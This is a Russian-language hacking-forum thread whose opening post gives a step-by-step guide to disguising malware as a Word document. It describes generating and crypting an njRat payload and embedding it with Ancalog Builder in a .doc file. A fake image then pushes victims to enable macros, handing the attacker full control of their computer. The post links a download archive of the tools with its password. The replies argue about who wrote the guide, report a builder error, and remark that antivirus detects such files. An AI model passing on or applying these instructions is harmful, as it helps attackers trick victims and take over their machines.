Идея Прячем свой вирус в doc*

Тема в разделе "Вирусология", создана пользователем Moshennik, 2 окт 2017.

  1. Moshennik

    Moshennik

    Сообщения:
    288
    Баллы:
    16
    Всем привет, сегодня я вам расскажу как стать на шаг ближе к статусу мамкиного кулхацкера.

    Итак, суть в том, что в роли вредоноса будет выступать .doc файл. Да-да, обычный вордовский файл который даже можно загрузить и отправить через вк. При запуске у жертвы будет уведомление о том, что нужно включить макросы, также в документе картинкой будет прикреплена просьба их включить т.к. типа документ отображается некорректно. После включения вы получаете полный контроль над компьютером жертвы.

    Теперь о том, что будет нужно. Нам понадобиться любой ратник, программа для склейки файлов (вы можете погуглить и написать свой макрос) и любой криптор на ваш вкус. Ссылки на те программы, которые использовал я будут ниже (не реклама).

    НАСТОЯТЕЛЬНО РЕКОМЕНДУЮ ЗАПУСКАТЬ ВСЕ НА ВИРТУАЛКЕ.

    1) Создаем наш payload в ратнике и криптуем его.

    2) Запускаем программу для склейки, добавляем в картинки наше предупреждение (оно есть в архиве Ancalog'а).



    http://telegra.ph/file/0e17360ebf846328ff19a.jpg
    3) Выбираем верхний пункт слева, нажимаем "GENERATE EXPLOIT FILE" и ставим наш закриптованный payload. Выскакивает предупреждение, жмем "ОК", далее выскакивает сообщение об успешном создании файла.

    Все, файл готов, запускаете ратник и кидаете файл жертве.



    Ссылка на скачивание: https://yadi.sk/d/c0hkJG-e3J3Vfa

    По ссылке:

    • njRat
    • Ancalog Builder
    • Aegis Crypter
    Пароль от архивов: docsploit
  2. darkIT

    darkIT

    Сообщения:
    35
    Баллы:
    6
    Там ещё была строчка в конце:
    "Мануал написан моим другом, крутым кодером 1msorry !"
    Нах вырезал?)
  3. Moshennik

    Moshennik

    Сообщения:
    288
    Баллы:
    16
    он не мой друг и манул слит !
  4. ims0rry

    ims0rry

    Сообщения:
    122
    Баллы:
    18
    Слит?) Это моя самая первая тема на соседнем борде
    20.04 еще написал
  5. Moshennik

    Moshennik

    Сообщения:
    288
    Баллы:
    16
    не слит он я видимо забыл добавить и что он с соседнего борда я знаю !
  6. sharuhan

    sharuhan

    Сообщения:
    83
    Баллы:
    6
    Ничего не понял.Есть видеоурок ?
  7. winyer

    winyer

    Сообщения:
    1
    Баллы:
    1
    Its show that:


    [Window Title]
    Ancalog Builder

    [Content]
    Unable to open file "D:\Archive\Ancalog Exploit Builder AchillePower/fl.dll".

    Press OK to ignore and risk data corruption.
    Press Cancel to kill the program.

    [OK] [Cancel]
  8. 4ERT

    4ERT RICH-BOSS Команда форума Модератор форума VIP Внесен депозит 4000$

    Сообщения:
    856
    Баллы:
    18
    Все равно любые макросы и подгрузка вируса палится всеми антивирусами

Поделиться этой страницей

Top